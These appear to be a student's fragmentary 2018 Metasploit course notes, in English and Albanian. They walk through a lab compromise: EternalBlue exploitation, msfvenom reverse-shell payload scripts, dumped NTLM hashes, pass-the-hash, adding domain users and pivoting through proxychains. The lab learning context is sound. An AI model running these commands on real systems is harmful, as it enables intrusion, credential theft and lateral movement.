Chapter 3 – Introduction to Metasploit 1. Picking an Exploit 2. Setting Exploit Options 3. Picking a Payload 4. Setting Payload Options 5. Running the Exploit 6. Connecting to the Remote System 7. Performing Post Exploitation Processes msf > show exploits help search search ms17-010 search cve:2013-3660 msf > search unreal msf > info exploit/unix/irc/unreal_ircd_3281_backdoor msf> use msf> set To start the Database at a terminal prompt, type the following: ● service postgresql start ● service metasploit start ● msfconsole LHOST = Local Host, or our Kali System RHOST = Remote Host, or our target System LPORT = Port we want to use on our Kali System RPORT = Port we want to attack on our target System > use exploit/unix/irc/unreal_ircd_3281_backdoor > show options > set rhost 192.168.15.214 > exploit ##Multiple Target Types > show targets > use exploit/windows/smb/ms08_067_netapi > show options > show targets > set target 2 > show options > show advanced ##Picking a Payload > show payloads > set payload examples: set payload osx/x86/shell_reverse_tcp set payload linux/x64/shell_reverse_tcp set payload windows/shell_reverse_tcp *set payload windows/meterpreter/reverse_tcp reverse_tcp ##type of ways that the payloads communicate back to the attacking system ##Setting Payload Options > show options > set payload windows/meterpreter/reverse_tcp ##Running the Exploit >show options > set lhost 192.168.15.236 (kali) > set rhost 192.168.15.243 (win) > exploit ##Connecting to a Remote Session > sessions ## To check what sessions were created > sessions -i nr meterpreter> ##prompt When we connect to the session meterpreter> shell ##we can see that we do indeed have a remote shell to the Windows system. Chapter 4 – Meterpreter Shell - word permes smb script mund me ngarku ne qat doc cfar malware eshte? pivoiting | tunneling autoraw reverse vs bind ############################################################################# 28.05.2018 rapid7 = metasploit e shkruar ne ruby development/perdorimi exploit vulnerability threat payload (e detekton antivirusi) vspftpd 2.3.4 (vulnerable) metasploit: msfconsole (prefered) msfvenom msfpayload (bashk ne venom) msf encode (bashk ne venom) msfgui - depirciated msfweb - depirciated msfconsole (prefered): armitage - gui per metasploit modulet: exploits auxiliary post payload encoders nops msfvenom -p --payload windows #OS platforma /meterpreter #platforma, lloj i payloadit reverse_tcp #forma e komunikimit LHOST= #ip e jone e cila ka me komuniku me malware LPORT= #port jone ku kemi me prit komunikim -f --Output format, exe or elf -o --out Save the payload psh foto.exe use exploit/multi/handler show options set payload windows/meterpreter/reverse_tcp set lhost local ip set lport local port xploit shell dir :) ############################################################################# ###04.2018 RC scripta #!bin/bash echo -n read chmod +x dardan ./dardan example msfvenon -p windows/meterpreter/reverse_tcp -f >shell.exe ================================================== nano script.rc --create use exploit/windows/smb/ms17_010_eternalblue set payload windows/meterpreter/reverse_tcp set RHOST 172.16.60.88 exploit sessions -i 1 msfconsole -r script.rc --to execute ================================================== nano auto.sh -- to create the file chmod +x auto.sh -- to make executable ./auto.sh -- to execute -------------------------------- #!bin/bash echo -n "Payload: " read payload echo -n "LHOST: " read lhost echo -n "LPOST: " read lport echo -n "Format: " read format echo -n "Name: " read emri msfvenom -p $payload LHOST=$lhost LPOST=$lport -f $format -o $emri.$format ================================================== echo -n "Payload: " read payload echo -n "LHOST: " read lhost echo -n "LPORT: " read lport echo -n "Format: " read format echo -n "Name: " read emri msfvenom -p $payload LHOST=$lhost LPOST=$lport -f $format -o $emri.$format echo "use exploit/multi/handler" > script.rc echo "set payload $payload" >>script.rc echo "set lhost $lhost" >> script.rc echo "set lport $lport" >> script.rc echo "exploit -j" >> script.rc msfconsole -r script.rc ./auto.sh --to execute ================================================== .############################################################################# *11.06.2018* kali - 172.16.60.78 *Pasi te marrim qasje.* Vector of Attack 1. viber check cfar app po perdor (psh viber) explore a permban imortant data 2. Outlook mail files mundet mu marr prej hacked machine outlook e run paswordin plaintext 3. Skype password e jep hashed, chat txt e jep clear text *Qysh me marr qasje mrena?* ##Target network 172.16.0.0/20 ##Enumeration SCAN: nmap 172.16.0.0/24 --make a default scan nmap -Pn 172.16.0.0/20 --Pn ping less nmap -O 172.16.0.0/20 ##Targeted service 445 SMB (services open, version services psh ftp, 3389) ##Confirm vulnerable hosts use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 172.16.0.0/26 set threads 10 run ##VULNERABLE HOSTS + 172.16.0.3:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7600) + 172.16.0.12:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1) + 172.16.0.16:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1) + 172.16.0.17:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1) + 172.16.0.18:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600) + 172.16.0.19:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600) + 172.16.0.20:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600) ##EXPLOITATION use exploit/windows/smb/ms17_010_eternalblue set RHOST 172.16.0.3 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit set RHOST 172.16.0.12 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit set RHOST 172.16.0.16 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit set RHOST 172.16.0.17 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit set RHOST 172.16.0.18 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit set RHOST 172.16.0.19 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit set RHOST 172.16.0.20 /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM exploit ##POST EXPLOITATION use post/windows/gather/enum_domain --e gjen doamin srv set session 1 run ( Cyberlab) use post/windows/gather/smart_hashdump --nxerr dhe presenton sam/system set session 1 run [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:647a6dc3a05c2a2443ae9c03b5959c44 [+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:822d4c38608cd94739144ace38e0a3db [+] Larry:1110:aad3b435b51404eeaad3b435b51404ee:847d0104f7c770d74cf4f3fcbaaacd65 [+] John:1112:aad3b435b51404eeaad3b435b51404ee:849c695d5a50144028fd6c672b00d751 [+] Lucia:1114:aad3b435b51404eeaad3b435b51404ee:78f25f28c59932b06b58b59711e8fb73 [+] Marina:1116:aad3b435b51404eeaad3b435b51404ee:edef6c82896b00f277e5a46111f806a5 [+] Alina:1117:aad3b435b51404eeaad3b435b51404ee:4484a79fef99132c010c98bde75c5399 [+] Keith:1118:aad3b435b51404eeaad3b435b51404ee:7e2b029882be49edc5633b34d4db3e7e [+] Patrick:1122:aad3b435b51404eeaad3b435b51404ee:609dd6f9fc3d51b3d628219de6f91a8d [+] Marc:1124:aad3b435b51404eeaad3b435b51404ee:4297197418be7a0e111290f4fc341e67 [+] Luke:1126:aad3b435b51404eeaad3b435b51404ee:faeadb333798089ee46de1f67740472d [+] Alfa:1130:aad3b435b51404eeaad3b435b51404ee:fd6e9a2f2646007192c7450ba21fb4df [+] Beta:1131:aad3b435b51404eeaad3b435b51404ee:8fb9d80ff33d178c16c3f43503468e83 [+] WIN-GOMU62G0LQE$:1000:aad3b435b51404eeaad3b435b51404ee:c17b74d23f5be7ad4284283393636df9 [+] LARRY-PC$:1111:aad3b435b51404eeaad3b435b51404ee:4b545d45b94464cfb56909fc8f7ddf1a [+] JOHN-PC$:1113:aad3b435b51404eeaad3b435b51404ee:0c913011dfdb67a9ca60b739fb578478 [+] LUCIA-PC$:1115:aad3b435b51404eeaad3b435b51404ee:890f2e94b3239f87093e21724aabf141 [+] KEITH-PC$:1119:aad3b435b51404eeaad3b435b51404ee:8a4d68ea1683fcbdaa73cba4e8a077ff [+] ALINA-PC$:1120:aad3b435b51404eeaad3b435b51404ee:4f9d70ddc18d29fa26634f1cf190c81f [+] MARINA-PC$:1121:aad3b435b51404eeaad3b435b51404ee:d128fd0a1972738bec382bd777d1a6ca [+] PATRICK-PC$:1123:aad3b435b51404eeaad3b435b51404ee:25d12edfe263dfa74d241b7eb8b39ea5 [+] MARC-PC$:1125:aad3b435b51404eeaad3b435b51404ee:03eb6af971a5d16b38fd91703e034077 [+] LUKE-PC$:1127:aad3b435b51404eeaad3b435b51404ee:73ab52f9d4900d661da3477b728ea366 use auxiliary/scanner/smb/smb_login set smbuser John set smbdomain Cyberlab set smbpass (vlera e hash=John:1000:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1::: set rhosts 172.16.0.0/26 set threads 10 set verbose false run ([+] 172.16.0.12:445 - 172.16.0.12:445 - Success: '.\John:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1' Administrator) use exploit/windows/smb/ms17_010_eternalblue on target172.16.0.18 verify then exploit set porcessname lsass.exe exploit =-WIN-= getuid /meterpreter > getuid > Server username: NT AUTHORITY\SYSTEM sysinfo /PC info use post/windows/gather/enum_applications set rhost 172.16.0.3 run use exploit/windows/smb/psexec set payload windows/meterperter/bind_tcp set rhost 172.16.0.12 set smbuser set smbdom set smb pass expoit run post/multi/gather/skype_enum run cat /home/.... --shihet skype chat me user e pass te nje email rdesktop 172.16.0.13 -u Larry -p ESGL -d CyberLab use exploit/windows/smb/psexec set smbdomain Cyberlab set PAYLOAD windows/x64/meterpreter/bind_tcp set rhost 172.16.0.12 exploit exploit getuid shell net user --i sheh users net user John --i sheh infot e keti user net user John /domain --domain info net user user1 password /add /domain --if denied net user user1 password /add --add localy net group "Domain Admins" /domain --tregon kush usera jane member session session -i backgroud ------------------------------------- run post/windows/gather run post/windows/gather/credentials run post/windows/gather/forensics /vnc /windows_autologon /enum_domain /enum_hostfile /enum_chrom /enum_ie /enum_logged_on_users /enum_ms_product_keys /enum_putty_saved_sessions /screen_spy /usb_history /screen_unlock run post/multi/gather/ run post/multi/manage skype_enum .############################################################################# 18.06.2018 Vectors: Link, Email, Social Engeenering ...adobe flash vulnerabilities, load option ne meterpreter???? query ne DC, impersonation, add user ad domain admin member, hack DC, Teknika: socks4, (auxiliary proxychains (tool, /ect/share/socks4 portfwd (port forwarding, ne hacked machine e bon port fw port ne localhost IP -> ne hacker machine tool: autoroute (POST tool) Stage1 - autoroute nmap -sn 172.16.0.0/24 (ping scan nano 172.16.0.0.exe (e run scan rezult nmap -sS -sV172.16.0.16 /gjen portet hap, banner grabbing (e run me nje file rezults nmap -p445 --scripts smb-vuln-ms17-010 172.16.0.16 (tregon SMB vuln. infos, https://exploit-db.com (me marr info per naj exploit msfconsole msf>search ms17_010 use exp/win/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhost 172.16.0.16 exploit .>getuid .>shell net user /domain net user nt-authoriity pass /add /domain net group "domain admin" /domain .> ping 172.16.16.16 (ska ping shell> ka ping .> run post/multi/manage/autoroute .>background .>route .> use aux/scan/portscan/tcp set rports 445 set rhost 172.16.16.16 run (tash e sheh edhe IP e tjetrin interface set rhosts 172.16.16.0-50 (range scan per 445 set threads 10 run session -i 1 arp -a ( me pa me kan ka communicate pra i bon cach meterpreter> run arp_scanner -r 172.16.16.0/24 .>background set rhost 172.16.16.23 .>set ports 22 (konfirmon open ports run .>sessions .>set rpots 1-1000 run nga hacker machine sk aping meterpreter> portfwd add -l 21 -p 21 -r 172.16.16.23 nga hacker machine ftp 172.16.16.23 meterpreter> run nga hacker machine ftp 172.16.16.23 (tash e qet hapur meterpreter> portfwd flush .> use aux/scanner/ftp/ftp_login .>set rhosts 172.16.16.23 .>run ( tregon version dhe info tjera per servisin .> use aux/scanner/ftp/anonymous .>set rhosts 172.16.16.23 .>exploit .> use aux/scanner/ftp/ftp_login .>set rhosts 172.16.16.23 set password anonymous run .> sessions meterpreter>portfwd -l 2221 -p 21 -r 172.16.16.23 nga hacker machine ftp 172.16.16.23 nc 172.16.16.23 2221 meterpreter> portfwd flush .>bckg .>user aux/server/socks4a .>run nga hacker machine nano /etc/proxychains.conf add socks4 127.0.0.1 1080 nmap 172.16.16.23 -p 21 (0 host up proxychains nmap 172.16.16.23 -p 21 proxychains ftp 172.16.16.23 (vjen login ftp> nga hacker machine proxychains firefox http://172.16.16.24 proxychains telnet 172.16.16.24 22 ------------------------------------------------ use aux/server/ browser_autopwn2 .>set exitonsession .>show advanced meterpreter> use port/win/gather.enum_domain .>set AutoRunScript port/win/gather.enum_domain (sessioni i marrur e bon run auto nje tjeter modul .############################################################################# nmap 60.52 -p- (all running port -sS -SV -p51 60.52 (banner grabbing nc 172.16.60.52 51 nano txt (ruje vleren en file base64 or 32 -d txt ( e dekodon ############################################################################ ############################################################################